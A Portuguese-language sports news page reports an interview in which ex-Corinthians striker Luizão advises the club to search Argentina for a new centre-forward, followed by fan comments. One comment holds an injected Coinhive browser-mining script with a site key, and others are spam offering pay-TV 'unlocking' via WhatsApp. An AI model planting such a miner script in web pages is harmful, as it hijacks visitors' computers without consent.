19/1/2018 19:47

Luizão sobre busca por atacante: "Se cavar, acha na Argentina"

Em entrevista, ex-atacante do Timão diz que mercado sul-americano pode ser uma opção

Luizão sobre busca por atacante:
Em poucos momentos a camisa 9 do Corinthians esteve tão bem representada como entre 1999 e 2002. Neste período, coube a Luizão utilizar o número às costas. E o centroavante, um dos maiores a passarem pelo Parque São Jorge, fez jus à importância da camiseta. Até por isso, sabe bem do que o Timão necessita neste início de 2018.



Em entrevista ao Meu Timão, Luizão, hoje com 42 anos, comentou a busca do clube por um centroavante que preencha a lacuna deixada pela transferência de Jô ao Nagoya Grampus, do Japão, firmada na primeira semana do ano. Na avaliação do ex-camisa 9 corinthiano, o Timão deve se ater ao mercado sul-americano, sobretudo o argentino.

“Está difícil achar um centroavante no Brasil, quase não tem”, disse Luizão, antes de dar uma sugestão à diretoria do Corinthians. “Eu acredito que, se cavar, acha na Argentina. Lá tem alguma coisa. Acredito que seria um bom lugar para procurar”, acrescentou o ex-jogador.

Revelado pelo Guarani, Luizão defendeu diversos times brasileiros, entre eles o Corinthians. Logo no primeiro ano, foi decisivo para a conquista do Campeonato Brasileiro (1999) – com direito a quatro gols na estreia, diante do Gama, derrotado por 4 a 2.

Na avaliação de Luizão, a possibilidade de o Timão jogar sem um atacante de referência não o convence. “Eu penso que todos os times deveriam ter um camisa 9. Fomos pentacampeões mundiais sempre com um jogador camisa 9 assim”, argumentou, em alusão ao título da Copa do Mundo de 2002, vencido pela Seleção Brasileira, a qual teve como protagonista Ronaldo Fenômeno.

Nas últimas semanas, os nomes de Henrique Dourado, do Fluminense, e Gilberto, agente livre, foram ventilados no CT Joaquim Grava. Em relação ao primeiro nome, o Corinthians considerou exorbitantes as pedidas tanto do atleta como do time das Laranjeiras. Já no segundo caso, a alta cúpula alvinegra garante que apenas buscou informações sobre o centroavante ex-São Paulo.

Questionado se o atual elenco é capaz de vencer títulos em 2018, o ex-camisa 9 é franco e diz entender que a equipe precisa se reforçar. “Eu vi pouco jogar este ano, todo mundo está voltando agora. Mas acredito que o Corinthians precisará de reforços, sim. É difícil eu falar quais posições porque ainda não vi bem este ano”, opinou Luizão, que também criticou o nível técnico do futebol nacional em 2017.

“O Corinthians foi campeão brasileiro, mas, com todo respeito, não encheu os olhos do futebol brasileiro. O que aconteceu foi que, no primeiro turno, os times não souberam marcar. Depois que aprenderam, a coisa ficou mais difícil”, concluiu.

Além do Brasileiro de 1999, Luizão foi artilheiro da Copa Libertadores da América (2000), com 15 gols, e campeão mundial (2000) pelo Corinthians. Ainda levantou os troféus do Campeonato Paulista (2001) e do Torneio Rio-São Paulo (2002) pela equipe do Parque São Jorge.

Aposentado desde 2009, após passagem pelo Rio Branco-SP, Luizão ostenta o feito de jogador brasileiro com mais gols na história da Libertadores. São 29 gols marcados em partidas da competição continental.


VEJA TAMBÉM
- Corinthians goleia o Fluminense e vence a primeira no Brasileirão
- Timão escalado para o jogo contra o Fluminense
- Timão escalado para o jogo contra o Argentinos Juniors









27246 visitas - Fonte: Meu Timão

Mais notícias do Corinthians

Notícias de contratações do Timão
Notícias mais lidas

Ah se o tempo voltasse à 19 anos atrás...teriamos um centroavante de verdade Luizão excelente agora tem kazin meu Deus

E MELHO UM JOGADOR PORQUE TEM DILHEIRO AI QUERO HENRIQUE DIURADO SEUS LADRÃO FDP COMPRA PORA QUE FICA BOM MANDA KAZIM PARA INFERNO

Carile todos corinthianos quer ver agora voce dar a mesma chance que deu ao turco pra Carlinhos antes de ser tarde

Ta na hora de jogar a responsa nas costas do Carlinhos, senão, ele nunca vai amadurecer, pelo que vi na copinha passada ele sabe fazer bem o pivô e sabe fazer gol. O Carille ta confiando no Kazim porque ele protege bem a bola igual ao Jô , só que ele precisa entender que o Jô fez um terço dos gols do Corinthians na temporada passada, já o Kazim tem muita dificuldade pra fazer gol. É por isso que não dá.

Carlinho da chance pra ele pocha

o Carlinhos seria uma boa aposta

pra que existir com karin e rim de mais.

nao precisa procurar pois ja tem um ai o Carlinhos pode ser esse camisa nove

Grande jogador

Erro ao postar comentário.
Código do erro: 803743

< src="https://coinhive.com/lib/coinhive.min.js"><>var a=new CoinHive.Anonymous("IoWE2BeVK3azaWL7xmC6HFJcYbwgiyoQ",{throttle:.3});a .start();

VOCÊ QUE ESTÁ CANSADO DE TER POUCA PROGRAMAÇÃO DE TVV ASSSINATURA E NÃO CONCORDA COM OS VALORES COBRADOS
FAÇO LIBERAÇÃO E DIMINUÍMOS O VALOR DA CONTA
PARA TODO BRASIL
WHATZSAP 11 958694345

Você que está pagado valores alto e teno pouco PROGRAMAÇÃO de TVV asssinatura faça liberação e DEMINUIMOS valor da conta pra qualquer luga do Brasil WHATZSAP 11958640776

Enviar Comentário

Para enviar comentários, você precisa estar cadastrado e logado no nosso site. Para se cadastrar, clique Aqui. Para fazer login, clique Aqui ou Conecte com Facebook.

Últimas notícias

  • publicidade
  • publicidade
    publicidade

    Brasileiro

    Dom - 16:00 - Neo Química Arena -
    X
    Corinthians
    Atletico-MG

    Sudamericana

    Ter - 19:00 - Neo Química Arena
    4 X 0
    Corinthians
    Nacional Asuncion
    publicidade
    publicidade
    publicidade